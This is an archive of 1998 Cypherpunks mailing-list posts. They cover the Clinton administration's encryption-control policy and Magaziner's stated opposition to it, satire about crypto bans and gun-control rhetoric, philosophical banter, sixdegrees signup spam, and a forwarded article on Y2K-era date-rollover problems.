From: "John Kelsey" <kelsey@plnet.net>
Date: Fri, 18 Sep 1998 12:47:47 +0800
To: <rah@shipwright.com>
Subject: Re: Questions for Magaziner?
Message-ID: <199809181747.MAA03503@email.plnet.net>
MIME-Version: 1.0
Content-Type: text/plain



> From: Robert Hettinga <rah@shipwright.com>
> To: cypherpunks@cyberpass.net; cryptography@c2.net; dcsb@ai.mit.edu
> Subject: Questions for Magaziner?
> Date: Thursday, September 17, 1998 11:38 PM
 
> Anyway, In light of more recent crypto-shenanigans from Billary,
and the
> fact that this thing's a small crowd, I figured I'd ask if anyone
on these
> lists had a question they wanted me to ask him.

Here's a question I would like to ask, in a rather rough form:

There has been a lot of talk by the administration about ``striking a
balance'' 
between citizens privacy concerns and the interests of police and spy
agencies.
Can you give us some concrete examples of what tradeoffs between
these two you
consider reasonable?  For example, what benefits to society would be
worth making
all private communications available to the FBI or NSA?  Would it be
a worthwhile
trade to the citizens of the US if we could double the street price
of cocaine, at 
the cost of essentially all phone calls being recorded and subject to
monitoring at 
any time?  How about cutting the (already barely measureable) risk of
dying from a 
terrorist act in half?  

My complaint with their rhetoric is that they always talk about these
tradeoffs and
about striking a balance, but we never seem to see any balance being
struck.  Striking
a balance means acknowledging that some societal benefits aren't
worth giving up our
privacy.  Will doubling the street price of cocaine improve my life
much?  It sure 
doesn't look like it will to me.  How about cutting my risk of dying
from a terrorist
act?  This is already much smaller than my risk of dying in a plane
crash; how much lower 
does it need to go?  (There is also the issue of whether any claimed
set of benefits
can be accomplished by key-escrow, or for that matter by putting a
videocamera and 
microphone in every home.  But that's a different issue.)

Of course, there are a bunch of problems with trying to analyze
violating fundamental
individual rights for some perceived social benefit, but I don't
think their basic argument 
can work, even if we grant that this sort of tradeoff is a legitimate
thing for governments
to do.  The tradeoffs we've seen offered have not given much weight
to citizens' desires for
privacy.  Consider the Clipper chip, the continued use of export
controls to slow down deployment of encryption in the US and
worldwide, the FBI's CALEA demands (including their
demand a few years ago to be able to listen in on 1/2% of all ongoing
calls in urban areas), 
etc.  We haven't seen any attempt to strike a balance so far, just an
attempt to claim 
some bureaucratic turf.


> Cheers,
> Bob Hettinga

--John Kelsey, kelsey@counterpane.com / kelsey@plnet.net
NEW PGP print =  5D91 6F57 2646 83F9 6D7F 9C87 886D 88AF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew James Gering <mgering@ecosystems.net>
Date: Fri, 18 Sep 1998 15:06:55 +0800
To: "Cypherpunks (E-mail)" <cypherpunks@cyberpass.net>
Subject: RE: Questions for Magaziner?
Message-ID: <33CCFE438B9DD01192E800A024C84A192846C3@mossbay.chaffeyhomes.com>
MIME-Version: 1.0
Content-Type: text/plain




Mr Magaziner, what do you think Thomas Jefferson meant when he stated:
"Those who desire to give up Freedom in order to gain Security, will not
have, nor do they deserve, either one."

	Matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "sixdegrees"<0jsf50m4@auto.sixdegrees.com>
Date: Fri, 18 Sep 1998 12:43:25 +0800
To: "TheReal CypherpunksList"<cypherpunks@toad.com>
Subject: Your new password
Message-ID: <199809181736.KAA21406@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



Name: TheReal CypherpunksList
sixdegrees password: grincusp

Congratulations TheReal. You're well on your way to 
becoming a full sixdegrees(tm) member. Here is your member 
password: grincusp. Use it to log-in on the home page 
at the sixdegrees Web site, http://www.sixdegrees.com. 
We'll ask you for a little more information to complete your 
registration, and then you'll be ready to start networking. 

It's important that you return to the site and log-in. Your 
membership will not be complete until you do so.

Once you've successfully logged in with your password, just go 
to Personal Profile and you'll be able to choose your own 
password.

Thanks for becoming part of sixdegrees. We're looking forward 
to seeing you at the site. 

====================================================================
PLEASE NOTE: All replies to this address are processed by a computer.
If you believe you received this e-mail in error, and it was not your 
intention to become a sixdegrees member, or if you have any problems, 
questions or requests send an e-mail to issues@sixdegrees.com
and someone will get back to you as soon as possible.
====================================================================


E.SI.BAM.1




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Fri, 18 Sep 1998 06:41:38 +0800
To: cypherpunks@einstein.ssz.com
Subject: Re: Clinton's fake apologies (fwd)
Message-ID: <199809181143.NAA22431@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



On Sat, 12 Sep 1998, Jim Choate wrote:

> I figure it's the fact that 'principles' are involved that is confusing
> everybody, no room to move like there is with relativism. Bottem line, he
> held a public office, while in that office he should commit *NO* crime or
> else he should loose that office. There was no abmiguity there in the minds
> of the founding fathers and there shouldn't be in yours either. If this
> confuses you then take it as an indication that you have a axiomatic
> contradiction in your world view and need to rethink things in a serious
> way.
> 
> As Jefferson said, if you hold a public office your public property.
> 
> Nail the son of a bitch to the wall, he did the crime let him do the time.
> 
> It's a pitty he doesn't have this sort of empathy for all those people he's
> put in jail for consensual crimes during his tenure. The man has a base
> double standard, let him pay for it.

I agree totally, but this has a somewhat deeper point.

The idiots in government sign into law all sorts of unconstitutional or
nonsensical legislation. As far as I'm concerned, it ought to be a law
that for *ANY* crime they commit they are thrown out of office and
prosecuted to the fullest extent of the law. Of course it would never
happen, but if it were to happen I think we'd see massive repeals of all
this bogus legislation.

"Senator, you have an encrypted file on your laptop. As per the Domestic
Cryptography Prohibition Act, I am here to seize your computer, the office
it is in, freeze your assets, and take you into custody. You will be
ejected from the Senate, effective immediately. If convicted, you will
spend the next five years at hard labor."

"But...But I didn't know it was there! It was a virus which put it there!"

"Ignorance of your violations of the law are no excuse. It says so in that
Act."

"Who is the idiot who passed this?!"

"You introduced it, sir. It was something about protecting the children
and how anybody who uses cryptography is a pedophile or something like
that."

Later that night, on the news: "Senator X was ejected from the Senate,
arrested, jailed, and charged today with unlawful possession of random
numbers. Later it was announced that former Senator X was charged with
trafficing in child pornography."

The next day: "In a daring no-knock morning raid, a flurry of automatic
weapons fire occured and former Senator X's family was killed in the
exchange. An FBI agent was quoted as saying, 'She was wielding an assault
baby and we had to take her down.'"

"It has just been announced that former Senator X is being charged under
the Domestric Cryptography Prohibition Act, which he sponsored, with
'crypto in a crime.' This carries an additional penalty of 10 years. When
asked what crime the cryptography was used in, an FBI representative
answered, 'Given what Senator X argued on the floor of the senate when he
introduced this bill, we're sure there is child pornography there
somewhere. Like he said, the only reason to use cryptography is if you
have something to hide, like child pornography or plans for widespread
global armageddon. Because he used cryptography, we don't know where or
what that porn is, but we're sure it's there somewhere.'"

Three years later: "Former Senator X was convicted today of one count of
'crypto in a crime,' five counts of possession of cryptography without a
license, eight counts of child porn (one for each encrypted file), and one
count of intent to use weapons of mass destruction. In a swift action, he
was sentenced to six consecutive life terms, to be served at hard labor."

"Jim, isn't all this agaist the Bill of Rights?"

"Well, Tom, it used to be, but since they repealed it..."

*fade to black*





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Motyka <mmotyka@lsil.com>
Date: Fri, 18 Sep 1998 15:59:14 +0800
To: cypherpunks@toad.com
Subject: Re: Democracy...
In-Reply-To: <80256682.00312692.00@seunt002e.ssa.co.uk>
Message-ID: <3602C866.3874@lsil.com>
MIME-Version: 1.0
Content-Type: text/plain



Richard,

Flogging a dead horse may serve a purpose: the steaks that show up on
your grocer's shelves might be a bit more tender. I have not tried to
say that morals lack value, simply that they are not absolutes.

> You may deride my absolutes but if applied by all we would have no crime, no 
> divorce etc. Boring??  Not really.  Many diseases and social problems would
> cease or be reduced.
>
One person's Utopia is, invariably, another's Hell. Utopia is not
achievable. Many have tried. All have failed. All future attempts will
fail. Any system that fails to acknowledge this will be insufferable.

Mike

"Heaven, heaven is a place, a place where nothing, nothing ever happens"
-Talking Heads- (More Songs About Buildings and Food?)

PS : are you a Physicist?

> Actually the speed of light varies depending on the medium 
>
This one deserves some reading but I suspect that 'not if you're the
photon'.

> and the mass of an electron with its velocity.
>
Gamma = 1 --> Lorentzian = Newtonian. Gamma = 1 if you are the electron
being measured. It is still the same after it has been accelerated, it
just reads differently from the outside.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Motyka <mmotyka@lsil.com>
Date: Fri, 18 Sep 1998 16:14:42 +0800
To: Michael Hohensee <mah248@nyu.edu>
Subject: Re: Democracy... (fwd) The Nature of Religion
In-Reply-To: <33CCFE438B9DD01192E800A024C84A192846AD@mossbay.chaffeyhomes.com>
Message-ID: <3602CDEC.4C09@lsil.com>
MIME-Version: 1.0
Content-Type: text/plain



Michael Hohensee wrote:
> 
> Actually, you may be interested to know that *everyone* is religious, in
> some manner.  Everyone has at least one untestable assumption about the
> world.  That is, everyone has a kind of faith.  Let's give some
> examples:
> 
> Christians believe that there exists a Being, called God, which somehow
> Moslems believe in the existance of a different God, and have different
> Atheists believe that God *doesn't* exist, which is essentially the same
> Even people who are nonreligious, or agnostic, have a religion.  For
> The Transcendentalists of the 19th century, for example, do not really
> Scientists tend to think differently.  Their beliefs can be described by

Lots of scientists look pretty religious about their 'science' to me.
Their untestable assumption being that they are capable of comprehending
what may be beyond them. Try reading His Master's Voice' by Stanislaw
Lem: very nice piece of fiction.
 
I'm now an avowed Apatheist - I don't give a damn what the answers to
unanswerable questions are. Especially when those answers come from
someone with an obvious agenda. Is that religious? 

Put a worm on the hook, pop the top off my beer. Argh! It's Coors. I
only wish it were imaginary. If not Guiness, at least let it be a
Corona.

Happy Friday,
Mike




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Bellovin <smb@research.att.com>
Date: Fri, 18 Sep 1998 13:52:37 +0800
To: "John Kelsey" <kelsey@plnet.net>
Subject: Re: Questions for Magaziner?
Message-ID: <199809181852.OAA02137@postal.research.att.com>
MIME-Version: 1.0
Content-Type: text/plain



It is, of course, worth remembering that Magaziner is pretty much on
our side on this issue.  He just hasn't been able to win over Freeh,
Reno, Clinton, etc.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "sixdegrees"<5j0g50e0@auto.sixdegrees.com>
Date: Fri, 18 Sep 1998 14:24:25 +0800
To: "Joe Cyberspanker"<cypherpunks@toad.com>
Subject: Hacker D00D
Message-ID: <199809181916.MAA22371@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



You've been listed again. Looks like this whole sixdegrees 
thing is working. Your networking potential is growing by the 
second. Hacker D00D listed you as "Mother."

Please let us know if you are in fact Hacker's Mother:

====================================================================
TO RESPOND:

FIRST, click your mail program's reply button. 

SECOND, in the reply e-mail that opens, on the first line of 
the message body, type only the word CONFIRM or the word DENY.

THEN CLICK SEND.

If you prefer, you can take care of this contact confirmation 
by visiting the site at http://www.sixdegrees.com and going to 
MY CONTACTS after logging in on the home page. You can also list 
new contacts there.

We look forward to hearing from you.

====================================================================
PLEASE NOTE: All replies to this address are processed by a computer.
If you have any problems, questions or requests send an e-mail to 
issues@sixdegrees.com and someone will get back to you as soon as 
possible.
====================================================================


E.DB.ANB.4




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Motyka <mmotyka@lsil.com>
Date: Fri, 18 Sep 1998 17:25:04 +0800
To: Tim May <tcmay@got.net>
Subject: Re: Questions for Magaziner?
In-Reply-To: <v04011700b22791ad2d2d@[139.167.130.248]>
Message-ID: <3602DE7E.1C0E@lsil.com>
MIME-Version: 1.0
Content-Type: text/plain



Tim May wrote:
> My view is that my writings are mine. They can try to get them with a
> search warrant or a court order, but they'd better not threaten me with
> imprisonment if I choose to write in some language they can't read. And
> that's all crypto really is, of course. Just another language.
> 
My gut feeling is that if a search turns up an encrypted file then, by
golly, what you see is what there is, make a bit-accurate copy and be on
your way, what's in my head belongs to me. But is that what the courts,
scared shitless of hordes of child molesters and terrorists conspiring
via secure e-mail and phones, will say? 

They'll probably avoid attacking the 1st and 4th( already weakened by
the war on drugs ) and attack the 5th with a 'greater good' argument and
the analogy of the locked safe. This requires an explanation of how the
stored documents are the modern-day .equivalent. of physical paper and
should be treated as such. It's only spitting distance from there to the
idea that a memorized key is the same as a physical key in which case
its owner doesn't enjoy the protections of the 5th. Hand it over Jack.
The law has to adapt to the changing technology. No need to outlaw
cryptography; just redefine the boundaries of the power to destroy.

Mike 

PS - How does a grant of limited immunity work?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Hedges <hedges@infopeace.com>
Date: Fri, 18 Sep 1998 17:59:04 +0800
To: cypherpunks@cyberpass.net
Subject: Re: BAN DOGS..
In-Reply-To: <v0401171fb228804644bd@[139.167.130.247]>
Message-ID: <v03130304b22834d17496@[209.75.197.30]>
MIME-Version: 1.0
Content-Type: text/plain




Some months ago, the cops in Washington D.C. swept through the housing
projects, rounded up, and executed a large number of 'illegal dogs' (pit
bulls?). There was a tiny paragraph in USA Today about it. -hedges-


>--- begin forwarded text
>
>
>From: vinnie@vmeng.com
>Date: Fri, 18 Sep 1998 09:34:32 -0700
>Subject:  BAN DOGS..
>To: rah@shipwright.com, Tamzen Cannoy <tamzen@worldbenders.com>
>MIME-Version: 1.0
>X-Priority: 3
>
>
>LETTER TO BAN DOGS
>
>To the Editor
>Arizona Republic
>P.O. Box 2244
>Phoenix, Arizona 85002
>
>January 7th, 1998
>
>Dear Editor,
>
>I am gratified to read in this morning's paper that someone has finally
>called attention to an urgent situation which I have known about for a long
>time:  annually 334,000 victims of savage dog bites, most frequently
>children, average age 15, are taken to the nation's emergency rooms.  As
>the article states: "That's more ER visits than injuries from skateboards,
>baby walkers and in-line skates combined."  Total annual cost of ER dog
>bites: $102.4 million.  Twenty or more people killed annually by dogs,
>almost all of them children.
>
>Because these dogs are so readily obtainable on the streets of our nation,
>I implore all your readers to immediately deluge their Congressmen with
>letters, phone calls, faxes and telegrams to support the federal "Save the
>Widdle Childwen Fwom the Vicious Dog-Bite Act of 1998", which would require
>the following: mandatory muzzles fitted with muzzle-locks to be kept at all
>times on all dogs, licensing and paw-printing of all dogs, fingerprinting
>and house-monitoring of dog owners, including mandatory,
>federally-monitored safe storage of dogs and an immediate 1,000% tax on all
>dog food.  This Act is sponsored by Canine Control Incorporated, an
>organization dedicated to eliminating canine violence in America by the
>year 2000. The Act also provides for the immediate banning of all "assault
>dogs", the definition of which term will constantly change according to the
>emotions of the board of C.C.I.  "Saturday Night Special" dogs, such as
>Chihuahuas and other cheap, easily concealed ankle-biters, will also be
>banned.  In addition, the Act bans all sharp canine teeth, all canine teeth
>longer than a federally-mandated length, all spiked collars and sharp
>canine toenails.  It also mandates that all dogs be transferred only
>through federally licensed dog dealers, and provides for the changing of
>the BATF to the Bureau of Alcohol, Tobacco, Firearms and Assault Dogs, or
>BATFAD.
>
>I hope that the physicians' organizations who champion total hand-gun
>banning will rally behind this urgent cause to save our nation's children.
>Anyone who opposes this type of legislation obviously hates children.  We
>need this Act desperately - after all, if it saves only one life, it is
>worth it.  Not to mention the $102.4 million dollars in ER charges!
>
>My husband's face was horribly mauled at the age of four by a Pit Bull;
>today he is the poster child for C.C.I.  Now, when not being used as a
>drooling doorstop or for first base, he is routinely wheeled out at charity
>fund-raising events at which he repeatedly mumbles, "Bad dogs!  Ban dogs!"
>
>We urgently need your help to get these vicious dogs off the streets now!
>Please help end canine violence in America!  Send donations to: C.C.I.,
>1111 B.S. Avenue, N.W., Washington, D.C.  20004.
>
>Make the checks out to me.
>
>Tina Terry
>
>c) 1998 by Tina Terry.  This letter may be reprinted in its entirety, as
>long as nothing in it is changed, credit is given the author, and the
>following is included.  Author's note: The author's husband's face really
>was mauled at age 4 by a Pit Bull, an incident in which he almost lost an
>eye.  He's not in a wheelchair, true, but he also doesn't blame dogs in
>general for his early experience and he loves and owns dogs to this day.  He
>also has never tried to enlist the author to run around the country trying
>to ban all dogs.
>
>
>
>--------------289FF090CB8537C73A0A0B03--
>
>--- end forwarded text
>
>
>-----------------
>Robert A. Hettinga <mailto: rah@philodox.com>
>Philodox Financial Technology Evangelism <http://www.philodox.com/>
>44 Farquhar Street, Boston, MA 02131 USA
>"... however it may deserve respect for its usefulness and antiquity,
>[predicting the end of the world] has not been found agreeable to
>experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'



__________________________________________________________________
  Mark Hedges   hedges@infopeace.com   www.infopeace.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Fri, 18 Sep 1998 15:44:39 +0800
To: "Arnold G. Reinhold" <dcsb@ai.mit.edu
Subject: Re: Questions for Magaziner?
In-Reply-To: <v04011700b22791ad2d2d@[139.167.130.248]>
Message-ID: <v0401171db22874ef99b6@[139.167.130.247]>
MIME-Version: 1.0
Content-Type: text/plain



Okay, so the short precis on Magaziner's answer to my question about
encryption controls, foriegn or domestic, is he's agin it.

He says that controlling foriegn encryption is impossible, and controlling
domestic encryption is, at the very least, unconstitutional.

He says that the reason the administration's encryption policy is so
convoluted is that the law enforcement and the "economic" encryption camps,
anti, and pro, evidently, is that the two sides are at loggerheads.
Magaziner mirrored Rivest's offer to tax encryption products to pay for
increased law enforcement technology support, but, hey, he's a liberal
democrat, he's supposed to tax us to death without thinking about the
economic, and, of course privacy consequences of raising the price of
encryption.

So, all in all, he got a round of foot-stomping applause from this bunch on
his pro-encryption stance, because, evidently, being a payments technology
forum, he was preaching to the choir. Something I found out when I was
doing my own speech yesterday. I should realize that anyone building a
payment system knows that digital commerce is financial cryptography, after
all. :-)

Cheers,
Bob Hettinga
-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Motyka <mmotyka@lsil.com>
Date: Fri, 18 Sep 1998 18:54:20 +0800
To: Michael Hohensee <mah248@is9.nyu.edu>
Subject: Re: Democracy... (fwd) The Nature of Religion
In-Reply-To: <33CCFE438B9DD01192E800A024C84A192846AD@mossbay.chaffeyhomes.com>
Message-ID: <3602F345.5BBD@lsil.com>
MIME-Version: 1.0
Content-Type: text/plain



Michael Hohensee wrote:
> So you do believe (or at least act under the assumption) that the
> universe is real, then? ;)
>
Don't know, don't trust anyone else's answer therefore don't really care
about the question. I'll contemplate it while sitting by the pool (
still at 88 degrees without a heater! ) after lots of margaritas. 

NYU, eh. Whether this is all real or I'm just a brain in a tank
somewhere playing every part and doing props too, I love the restaurant
hunting in The City. I can't take the population density for too many
days in a row but it's *great* for a visit. Crack dealers still
operating openly in WSP?

Mike




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Fri, 18 Sep 1998 16:37:39 +0800
To: cypherpunks@cyberpass.net
Subject: BAN DOGS..
Message-ID: <v0401171fb228804644bd@[139.167.130.247]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


From: vinnie@vmeng.com
Date: Fri, 18 Sep 1998 09:34:32 -0700
Subject:  BAN DOGS..
To: rah@shipwright.com, Tamzen Cannoy <tamzen@worldbenders.com>
MIME-Version: 1.0
X-Priority: 3


LETTER TO BAN DOGS

To the Editor
Arizona Republic
P.O. Box 2244
Phoenix, Arizona 85002

January 7th, 1998

Dear Editor,

I am gratified to read in this morning's paper that someone has finally
called attention to an urgent situation which I have known about for a long
time:  annually 334,000 victims of savage dog bites, most frequently
children, average age 15, are taken to the nation's emergency rooms.  As
the article states: "That's more ER visits than injuries from skateboards,
baby walkers and in-line skates combined."  Total annual cost of ER dog
bites: $102.4 million.  Twenty or more people killed annually by dogs,
almost all of them children.

Because these dogs are so readily obtainable on the streets of our nation,
I implore all your readers to immediately deluge their Congressmen with
letters, phone calls, faxes and telegrams to support the federal "Save the
Widdle Childwen Fwom the Vicious Dog-Bite Act of 1998", which would require
the following: mandatory muzzles fitted with muzzle-locks to be kept at all
times on all dogs, licensing and paw-printing of all dogs, fingerprinting
and house-monitoring of dog owners, including mandatory,
federally-monitored safe storage of dogs and an immediate 1,000% tax on all
dog food.  This Act is sponsored by Canine Control Incorporated, an
organization dedicated to eliminating canine violence in America by the
year 2000. The Act also provides for the immediate banning of all "assault
dogs", the definition of which term will constantly change according to the
emotions of the board of C.C.I.  "Saturday Night Special" dogs, such as
Chihuahuas and other cheap, easily concealed ankle-biters, will also be
banned.  In addition, the Act bans all sharp canine teeth, all canine teeth
longer than a federally-mandated length, all spiked collars and sharp
canine toenails.  It also mandates that all dogs be transferred only
through federally licensed dog dealers, and provides for the changing of
the BATF to the Bureau of Alcohol, Tobacco, Firearms and Assault Dogs, or
BATFAD.

I hope that the physicians' organizations who champion total hand-gun
banning will rally behind this urgent cause to save our nation's children.
Anyone who opposes this type of legislation obviously hates children.  We
need this Act desperately - after all, if it saves only one life, it is
worth it.  Not to mention the $102.4 million dollars in ER charges!

My husband's face was horribly mauled at the age of four by a Pit Bull;
today he is the poster child for C.C.I.  Now, when not being used as a
drooling doorstop or for first base, he is routinely wheeled out at charity
fund-raising events at which he repeatedly mumbles, "Bad dogs!  Ban dogs!"

We urgently need your help to get these vicious dogs off the streets now!
Please help end canine violence in America!  Send donations to: C.C.I.,
1111 B.S. Avenue, N.W., Washington, D.C.  20004.

Make the checks out to me.

Tina Terry

c) 1998 by Tina Terry.  This letter may be reprinted in its entirety, as
long as nothing in it is changed, credit is given the author, and the
following is included.  Author's note: The author's husband's face really
was mauled at age 4 by a Pit Bull, an incident in which he almost lost an
eye.  He's not in a wheelchair, true, but he also doesn't blame dogs in
general for his early experience and he loves and owns dogs to this day.  He
also has never tried to enlist the author to run around the country trying
to ban all dogs.



--------------289FF090CB8537C73A0A0B03--

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Fri, 18 Sep 1998 16:37:56 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Catchy.
Message-ID: <v04011721b22881448091@[139.167.130.247]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Resent-Date: Thu, 17 Sep 1998 11:35:55 -0400
X-Authentication-Warning: qnx.com: localhost [127.0.0.1] didn't use HELO
protocol
To: 0xdeadbeef@substance.abuse.blackdown.org
Subject: Re: Catchy.
Date: Thu, 17 Sep 1998 11:18:57 -0400
From: glen mccready <glen@qnx.com>
Resent-From: 0xdeadbeef@substance.abuse.blackdown.org
X-Mailing-List: <0xdeadbeef@substance.abuse.blackdown.org> archive/latest/196
X-Loop: 0xdeadbeef@substance.abuse.blackdown.org
Precedence: list
Resent-Sender: 0xdeadbeef-request@substance.abuse.blackdown.org


From: Andrew Isaacson <adisaacs@mtu.edu>

On Thu, Sep 17, 1998 at 08:34:49AM -0400, glen mccready wrote:
>
> Forwarded-by: nev@bostic.com
> Forwarded-by: Kirk McKusick <mckusick@McKusick.COM>
> From: Rick Kawala <condor@QueerNet.ORG>
>
> I was with a friend in Cafe Flore the other night and I had to ask the
> counterperson what was playing on the stereo. Sort of techno but with
> vocals on some tracks, minorish key, really great.  Anyway, the CD arrived
> and track 10 is called "PGP". And yes, they're talking about *that* PGP.
> My God, an ode to data privacy. This computer thing is getting out of
> hand. :)
> 		Rick

The CD is titled 'unlearn', the artist is psykosonik, and it's
Copyright 1995.  This computer thing got out of hand a long time ago.

(It's on the Wax Trax label too, so you know it's gotta be good.)

-andy
--
Andy Isaacson adisaacs@mtu.edu adi@acm.org    Fight Spam, join CAUCE:
http://www.csl.mtu.edu/~adisaacs/              http://www.cauce.org/

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Fri, 18 Sep 1998 16:38:22 +0800
To: cypherpunks@cyberpass.net
Subject: Doomsdays
Message-ID: <v04011722b22881788cb8@[139.167.130.247]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Resent-Date: Thu, 17 Sep 1998 09:41:42 -0400
X-Authentication-Warning: qnx.com: localhost [127.0.0.1] didn't use HELO
protocol
To: 0xdeadbeef@substance.abuse.blackdown.org
Subject: Doomsdays
Date: Thu, 17 Sep 1998 09:25:52 -0400
From: glen mccready <glen@qnx.com>
Resent-From: 0xdeadbeef@substance.abuse.blackdown.org
X-Mailing-List: <0xdeadbeef@substance.abuse.blackdown.org> archive/latest/195
X-Loop: 0xdeadbeef@substance.abuse.blackdown.org
Precedence: list
Resent-Sender: 0xdeadbeef-request@substance.abuse.blackdown.org


Forwarded-by: nev@bostic.com
Forwarded-by: Jeffrey C Honig <jch@honig.net>
Forwarded-by: Monty Solomon <monty@roscom.com>
Newsgroups: comp.dcom.telecom

Jan. 1, 2000 Isn't Only 'Doomsdate'
http://webserv1.startribune.com/cgi-bin/stOnLine/article?thisSlug=Y2K13

Published Sunday, September 13, 1998

Jan. 1, 2000, isn't only 'doomsdate'

Steve Woodward / Newhouse News Service

Jan. 1, 2000, is The Big One, kids.

By now, you've heard that many of the world's computers will roll the
date clock forward from "99" to "00" with potentially disastrous
consequences. Year 2000 authorities prophesy problems as minor as
erroneous overdue notices from the library and as major as a failure of
the nation's power grid.

But that isn't the only computer "doomsdate" looming. A slew of
lesser-known dates also could wreak technological havoc.

So brace yourself. The first date to dread -- Jan. 1, 1999 -- is fast
approaching.


Jan. 1, 1999: The one-year-look-ahead problem

Not every computer counts forward like you and me. Some look down the
road one entire year and count backward to determine the date. (Please
don't ask why.) On Jan. 1, 1999, some will look forward one year and see
"00." Like humans, the computers may balk at having to count backward
from 00.

Jan. 1, 1999, to Dec. 31, 2002: The euro currency problem

We all know that the year 2000 problem is the biggest software project
in history. But many Americans are unaware that programmers throughout
the world are also at work on the second biggest software project in
history: converting the currencies of 11 European nations into a single
currency called the euro.

Banks and financial institutions will begin transacting business in
euros on Jan. 1, 1999, although the actual bank notes won't be issued
until Jan. 1, 2001. The introduction of the euro is to continue through
the year 2002.

There's no direct link between the euro project and the Y2K project, but
the massive size of the simultaneous projects will soon take most of the
world's available programmers.


Aug. 21, 1999: The GPS rollover problem

The world's 24 global positioning satellites record time by counting the
weeks that have passed since their launch in 1980. The weeks fill up a
counter much like the odometer on your car. But like your odometer, the
counter rolls over to 0000 when it's full. At midnight on Aug. 21, 1999,
the counter will be full. Equipment that uses the GPS signals may
malfunction.


Sept. 9, 1999: The 9999 end-of-file problem

Many computers have been programmed to recognize 9999 as an
"end-of-file" command. Perhaps some computers will conclude, quite
logically, that a date of 9/9/99 means it's the end of all time.


Oct. 1, 1999: The federal fiscal year 2000 problem

Big Daddy rolls its clock forward Oct. 1, 1999. As of that date, the
federal government officially enters its 2000 budget year. Every federal
function will be affected, from defense to Medicare to payments on the
federal debt.


Jan. 4, 2000: The first-working-day-of-the-year problem

Year 2000 begins on a Saturday. Corporate America will switch on most of
its desktop computers Tuesday, Jan. 4, after a long holiday weekend.
Boot up and hang on to your morning mochas.


Feb. 29, 2000: The Year 2000 leap year problem, Part I

Most programmers know the rules for calculating leap years: Any year
evenly divisible by four is a leap year, except years that also are
divisible by 100. So 1996 is a leap year, but 2000 isn't -- er, right?
Well, there's a third, lesser-known rule that cancels the first two: Any
year divisible by 400 is a leap year, including -- you guessed it --
2000. The question is: How many programmers know that rule?


Dec. 31, 2000: The Year 2000 leap year problem, Part II

Some computers work by counting the number of days in the year. If they
aren't programmed to know that 2000 is a leap year, the machines will be
bewildered when they reach Dec. 31, 2000, the seemingly impossible 366th
day of the year.


Sept. 8, 2001: The Unix end-of-file problem

Unix is the "other" major operating system, a set of instructions that,
like Windows, DOS and MacOS, run the basic functions of a computer. Unix
powers many commercial and Internet computers. Unix tells time
differently, which means that it does not have a year 2000 problem.
Unfortunately, it does have a Sept. 8, 2001, problem. In Unix language,
that date is represented by the number 999,999,999 -- the same number
that some Unix applications use to denote the end of a file.


Circa 2025: The U.S. telephone number problem

By the year 2025 or so, the United States will simply run out of
available seven-digit telephone numbers and area codes. Telephone
companies will have to add digits or revamp the numbering system. That,
in turn, will force software programmers to overhaul every piece of
software that uses phone numbers, plus all databases and archives that
store phone numbers.


Jan. 19, 2038: The other Unix problem

The Unix operating system tells time by counting the number of seconds
elapsed since Jan. 1, 1970. But like your odometer, there are only so
many places on its counter. At seven seconds past 3:14 a.m. on Jan. 19,
2038, the counters on every Unix computer in the world will be full and
will roll over to "0." Many computers will assume it's either Jan. 1,
1970, all over again (who wants to relive the '70s?) or that it's the
end of the world (which may be a better alternative than the preceding).


Circa 2050 to 2075: The Social Security number problem

By 2075, the United States will have exhausted the 1 billion unique
Social Security numbers possible under its nine-digit numbering system.
Year 2000 expert Capers Jones suggests that the nation must be prepared
by 2050 to expand or replace the many software applications that depend
on those numbers.

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
